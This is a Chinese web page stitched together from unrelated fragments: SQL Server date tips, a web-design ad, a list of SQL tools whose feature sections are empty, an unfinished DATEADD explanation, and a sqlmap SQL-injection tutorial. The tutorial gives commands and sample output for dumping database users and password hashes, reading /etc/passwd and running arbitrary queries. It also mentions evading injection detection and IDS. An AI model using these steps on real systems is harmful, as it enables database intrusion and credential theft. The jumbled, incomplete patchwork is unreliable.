sql中步骤获取当天时间的零点如下:
十年的龙泉网站建设经验,针对设计、前端、开发、售后、文案、推广等六对一服务,响应快,48小时及时工作处理。营销型网站的优势是能够根据用户设备显示端的尺寸不同,自动调整龙泉建站的显示方式,使网站能够适用不同显示终端,在浏览器中调整网站的宽度,无论在任何一种浏览器上浏览网站,都能展现优雅布局与设计,从而大程度地提升浏览体验。创新互联公司从事“龙泉网站设计”,“龙泉网站推广”以来,每个客户项目都认真落实执行。
1、打开sqlserver数据库管理工具,点击“新建查询”,打开一个书写SQL语句的新窗口,输入sql语句,查询当前的数据库日期。
2、获取sqlserver中的最小日期,注意,这个日期的时间就是0点。
3、获取当前日期距离最小日期,经过了多少天。
4、 从sqlserver最小日期加上这个天数,就得到了当天的0点。
昨天晚上实在忍不住,还是看了一些,然后测试了一下。里面的sql语句太过于简单,不过你可以定制。修改为更富在的语句。以绕过注入检测和其他IDS设 备。 稍晚一下,我编译一个dos版本的给你们。
1、首先安装python2.5。 2、然后进入sqlmap的目录,执行sqlmap
详细用法
1、sqlmap -u 注入点 2、sqlmap -g "关键词“ //这是通过google搜索注入,现在还不可以,不知道是什么原因,可以直接修改为百度 3、 python sqlmap.py -u ";cat=2" -v 1
[hh:mm:25] [INFO] testing if the url is stable, wait a few seconds [hh:mm:26] [INFO] url is stable [hh:mm:26] [INFO] testing if GET parameter 'id' is dynamic [hh:mm:26] [INFO] confirming that GET parameter 'id' is dynamic [hh:mm:26] [INFO] GET parameter 'id' is dynamic [hh:mm:26] [INFO] testing sql injection on GET parameter 'id' [hh:mm:26] [INFO] testing numeric/unescaped injection on GET parameter 'id' [hh:mm:26] [INFO] confirming numeric/unescaped injection on GET parameter 'id' [hh:mm:26] [INFO] GET parameter 'id' is numeric/unescaped injectable [hh:mm:26] [INFO] testing MySQL [hh:mm:26] [INFO] query: CONCAT('5', '5') [hh:mm:26] [INFO] retrieved: 55 [hh:mm:26] [INFO] performed 20 queries in 0 seconds [hh:mm:26] [INFO] confirming MySQL [hh:mm:26] [INFO] query: LENGTH('5') [hh:mm:26] [INFO] retrieved: 1 [hh:mm:26] [INFO] performed 13 queries in 0 seconds [hh:mm:26] [INFO] query: SELECT 5 FROM information_schema.TABLES LIMIT 0, 1 [hh:mm:26] [INFO] retrieved: 5 [hh:mm:26] [INFO] performed 13 queries in 0 seconds remote DBMS: MySQL = 5.0.0
4、指定参数注入
python sqlmap.py -u ";cat=2" -v 1 -p "id"
[hh:mm:17] [INFO] testing if the url is stable, wait a few seconds [hh:mm:18] [INFO] url is stable [hh:mm:18] [INFO] testing sql injection on parameter 'id' [hh:mm:18] [INFO] testing numeric/unescaped injection on parameter 'id' [hh:mm:18] [INFO] confirming numeric/unescaped injection on parameter 'id' [hh:mm:18] [INFO] parameter 'id' is numeric/unescaped injectable [...]
Or if you want to provide more than one parameter, for instance:
$ python sqlmap.py -u ";cat=2" -v 1 -p "cat,id"
5、指定方法和post的数据 python sqlmap.py -u "" --method "POST" -- data "id=1cat=2"
6、指定cookie,可以注入一些需要登录的地址 python sqlmap.py -u ";cat=2" --cookie "COOKIE_VALUE"
7、通过代理注入 python sqlmap.py -u ";cat=2" --proxy "" 8、指定关键词,也可以不指定。程序会根据返回结果的hash自动判断 python sqlmap.py -u ";cat=2" --string "STRING_ON_TRUE_PAGE" 9、指定数据,这样就不用猜测其他的数据库里。可以提高效率。 --remote-dbms 10、指纹判别数据库类型 python sqlmap.py -u ";cat=2" -v 1 -f 11、获取banner信息 python sqlmap.py -u ";cat=2" -b
banner: '5.0.38-Ubuntu_0ubuntu1.1-log'
12、获取当前数据库,当前用户,所有用户,密码,所有可用数据库。 python sqlmap.py -u ";cat=2" -- current-db
current database: 'testdb'
python sqlmap.py -u ";cat=2" --users
database management system users [5]: [*] 'debian-sys-maint'@'localhost' [*] 'root'@'127.0.0.1' [*] 'root'@'leboyer' [*] 'root'@'localhost' [*] 'testuser'@'localhost'
python sqlmap.py -u ";cat=2" -- passwords
database management system users password hashes: [*] debian-sys-maint [1]: password hash: *XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX [*] root [1]: password hash: *YYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYY [*] testuser [1]: password hash: *ZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZ
python sqlmap.py -u ";cat=2" --dbs
available databases [3]: [*] information_schema [*] mysql [*] testdb
python sqlmap.py -u ";cat=2" --tables -D "information_schema"
Database: information_schema [16 tables] +---------------------------------------+ | CHARACTER_SETS | | COLLATION_CHARACTER_SET_APPLICABILITY | | COLLATIONS | | COLUMN_PRIVILEGES | | COLUMNS | | KEY_COLUMN_USAGE | | ROUTINES | | SCHEMA_PRIVILEGES | | SCHEMATA | | STATISTICS | | TABLE_CONSTRAINTS | | TABLE_PRIVILEGES | | TABLES | | TRIGGERS | | USER_PRIVILEGES | | VIEWS | +---------------------------------------+
python sqlmap.py -u ";cat=2" -- columns -T "user" -D "mysql"
Database: mysql Table: user [37 columns] +-----------------------+------+ | Column | Type | +-----------------------+------+ | Alter_priv | enum | | Alter_routine_priv | enum | | Create_priv | enum | | Create_routine_priv | enum | | Create_tmp_table_priv | enum | | Create_user_priv | enum | | Create_view_priv | enum | | Delete_priv | enum | | Drop_priv | enum | | Execute_priv | enum | | File_priv | enum | | Grant_priv | enum | | Host | char | | Index_priv | enum | | Insert_priv | enum | | Lock_tables_priv | enum | | max_connections | int | | max_questions | int | | max_updates | int | | max_user_connections | int | | Password | char | | Process_priv | enum | | References_priv | enum | | Reload_priv | enum | | Repl_client_priv | enum | | Repl_slave_priv | enum | | Select_priv | enum | | Show_db_priv | enum | | Show_view_priv | enum | | Shutdown_priv | enum | | ssl_cipher | blob | | ssl_type | enum | | Super_priv | enum | | Update_priv | enum | | User | char | | x509_issuer | blob | | x509_subject | blob | +-----------------------+------+
13、显示指定的文件内容,一般用于php python sqlmap.py -u ";cat=2" --file / etc/passwd
/etc/passwd: --- root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/bin/sh man:x:6:12:man:/var/cache/man:/bin/sh lp:x:7:7:lp:/var/spool/lpd:/bin/sh mail:x:8:8:mail:/var/mail:/bin/sh news:x:9:9:news:/var/spool/news:/bin/sh uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh proxy:x:13:13:proxy:/bin:/bin/sh www-data:x:33:33:www-data:/var/www:/bin/false backup:x:34:34:backup:/var/backups:/bin/sh nobody:x:65534:65534:nobody:/nonexistent:/bin/sh mysql:x:104:105:MySQL Server,,,:/var/lib/mysql:/bin/false postgres:x:105:107:PostgreSQL administrator,,,:/var/lib/postgresql:/ bin/bash inquis:x:1000:100:Bernardo Damele,,,:/home/inquis:/bin/bash ---
14、执行你自己的sql语句。
python sqlmap.py -u ";cat=2" -v 1 -e "SELECT password FROM mysql.user WHERE user = 'root' LIMIT 0, 1"
[hh:mm:18] [INFO] fetching expression output: 'SELECT password FROM mysql.user WHERE user = 'root' LIMIT 0, 1' [hh:mm:18] [INFO] query: SELECT password FROM mysql.user WHERE user = 'root' LIMIT 0, 1 [hh:mm:18] [INFO] retrieved: YYYYYYYYYYYYYYYY [hh:mm:19] [INFO] performed 118 queries in 0 seconds SELECT password FROM mysql.user WHERE user = 'root' LIMIT 0, 1: 'YYYYYYYYYYYYYYYY'
15、union注入 python sqlmap.py -u ";cat=2" --union- check
valid union: ' UNION ALL SELECT NULL, NULL, NULL--cat=2'
python sqlmap.py -u ";cat=2" -v 1 -- union-use --banner
[...] [hh:mm:24] [INFO] testing inband sql injection on parameter 'id' [hh:mm:24] [INFO] the target url could be affected by an inband sql injection vulnerability [hh:mm:24] [INFO] confirming inband sql injection on parameter 'id' [...] [hh:mm:24] [INFO] fetching banner [hh:mm:24] [INFO] request: UNION ALL SELECT CONCAT(CHAR(95,95,83,84,65,82,84,95,95), VERSION(), CHAR(95,95,83,84,79,80,95,95)), NULL, NULL--cat=2 [hh:mm:24] [INFO] performed 1 queries in 0 seconds banner: '5.0.38-Ubuntu_0ubuntu1.1-log'
16、保存注入过程到一个文件,还可以从文件恢复出注入过程,很方便,一大特色。你可以在注入的时候中断,有时间再继续。 python sqlmap.py -u ";cat=2" -v 1 -b - o "sqlmap.log"
[...] [hh:mm:09] [INFO] fetching banner [hh:mm:09] [INFO] query: VERSION() [hh:mm:09] [INFO] retrieved: 5.0.30-Debian_3-log [hh:mm:11] [INFO] performed 139 queries in 1 seconds banner: '5.0.38-Ubuntu_0ubuntu1.1-log'
python sqlmap.py -u ";cat=2" -v 1 -- banner -o "sqlmap.log" --resume
[...] [hh:mm:13] [INFO] fetching banner [hh:mm:13] [INFO] query: VERSION() [hh:mm:13] [INFO] retrieved the length of query: 26 [hh:mm:13] [INFO] resumed from file 'sqlmap.log': 5.0.45-Deb [hh:mm:13] [INFO] retrieved: ian_1ubuntu3-log banner:
出于安全考虑,数据库服务器只允许堡垒机通过ssh访问,这对日常的使用带来了麻烦。
昨天的工作中,就遇到了这样的问题,MySQL数据库放在了服务器A上,只允许服务器B来访问,而我在机器C上,可以通过ssh连接服务器B。为了解决在机器C上连接MySQL这个问题。
因为市场上有许多的SQL管理工具,所以要为SQL项目管理选择工具是一件有挑战性的事。为大家推荐23款SQL工具的精选列表,希望朋友们喜欢。其中几款已经在昨天的SQL查询优化工具一文中,做过推荐。
Aqua Data Studio是一个功能丰富的通用SQL集成开发环境(IDE),它使数据库开发人员,DBA和数据/业务分析人员能够从单个界面开发,管理和分析30多个平台的数据。
特征:
dbForge Studio for SQL Server是一个功能强大的IDE,用于SQL Server管理,管理,开发,数据报告,分析等等。执行复杂数据库任务的SQL开发人员和DBA可以使用GUI工具来加速几乎所有数据库体验,例如设计数据库,编写SQL代码,比较数据库,同步模式和数据,生成有意义的测试数据等等。
特征:
dbWatch是一个完整的数据库监控和管理解决方案,适用于SQL Server,Oracle,PostgreSQL,Sybase,MySQL和Azure。专为在大型内部部署,混合或云数据库环境中进行主动管理和日常维护自动化而设计。
特征:
Jet Profiler for MySQL是MySQL数据库服务器的实时查询性能和诊断工具。该工具自2009年开发,非常稳定。
特征:
Adminer是一个用于管理数据库,表,关系,索引和用户的SQL管理工具。它支持所有流行的数据库管理系统,如MySQL,PostgreSQL,SQLite,MS SQL,Oracle和MongoDB。
特征:
它是一种用于分析微软SQL Server数据库结构差异的SQL管理工具。它允许比较数据库对象,如表,列,索引,外键,模式等。
特征:
EMS SQL Manager允许用户创建和编辑SQL Server数据库对象,并创建,修改,执行和保存SQL查询。
特征:
它是一个基于JAVA的数据库管理工具。这种符合JDBC的SQL管理工具允许用户查看数据库结构并发出SQL命令。它还支持Firebird,微软Access,微软SQL Server,MySQL,Oracle,Sybase等数据库。
特征:
SQLite Database Browser是一个开源SQL工具,允许用户创建,设计和编辑SQLite数据库文件。它允许用户显示由它们和应用本身发出的所有SQL命令的日志。
特征:
DBeaver是一个面向开发人员和数据库管理员的开源数据库工具。它支持JDBC兼容的数据库,如MySQL,Oracle,IBM DB2,SQL Server,Firebird,SQLite和Sybase。
特征:
DbVisualizer Free是一个SQL管理工具。它允许用户管理各种数据库,包括Oracle,Sybase,SQL Server,MySQL,Informix,H3和SQLite。
特征:
HeidiSQL是另一种可靠的SQL管理工具。它使用流行的MySQL服务器,微软SQL数据库和PostgreSQL设计。它允许用户浏览和编辑数据,创建和编辑表,视图,触发器和预定事件。
特征:
FlySpeed SQL Query是所有数据库用户和开发人员的数据处理工具。它允许用户在不熟悉SQL语法的情况下在不同的数据库服务器上构建查询。
特征:
SQL Diagnostic Manager是Idera开发的性能监控工具。它提供诊断解决方案,帮助用户评估其SQL Server中的运行状况和性能。
特征:
ManageEngine开发的免费SQL性能监控工具。它允许用户密切关注SQL Server性能!此工具还可以帮助用户监控SQL Server的性能和可用性。它可以与MS SQL 2012和2014等所有MS SQL版本一起使用。
特征:
ApexSQL Monitor是一个基于Web的SQL管理应用程序。它为监控多个SQL Server实例提供支持。
特征:
适用于微软SQL Server的AppDynamics数据库管理产品的一种全面SQL工具。它用于监控SQL Server的2000,2005,2008,2012和2014版本。
特征:
Toad是另一个SQL Server DBMS工具。它通过广泛的自动化,直观的工作流程和内置的专业知识最大化了生产力。此SQL管理工具可解决问题,管理更改并提升最高级别的代码质量。
特征:
Zenoss提供ZenPacks来管理微软SQL Server,MySQL,Oracle数据库和PostgreSQL。每个ZenPack都具有每个平台的特定功能,并提供可用的API来确定应监控的内容。
特征:
Lepide的SQL Server Storage Manager是一个用于分析SQL Server性能的开源实用程序。它提供了对存储空间和性能的完全可视性。
特征:
SQL Server Management Studio Express是一个用于访问,管理和开发SQL所有组件的开源工具。此工具支持SQL Server的大多数管理任务。
特征:
SolarWinds Database Performance Analyzer是用于数据库管理的性能监视和分析工具。它还找出了瓶颈的原因并降低了数据库操作的总体成本。
特征:
Sequel Pro是一款快速,易用的数据库管理工具,适用于MySQL。此SQL管理工具有助于与数据库进行交互。使用此软件添加新数据库,添加新表,添加新行和任何其他类型的数据库也很容易。
特征:
SQL语句使用DATEADD得到一个时间加上或减去指定天数之后的时间。也适用于小时、分钟、秒钟等等
DATEADD() 函数功能:在日期中添加或减去指定的时间间
语法:DATEADD(datepart,number,date)
date 参数是合法的日期表达式。number 是您希望添加的间隔数;对于未来的时间,此数是正数,对于过去的时间,此数是负数。
datepart 参数可以是下列的值:
下面已系统当前时间(getdate())为例:
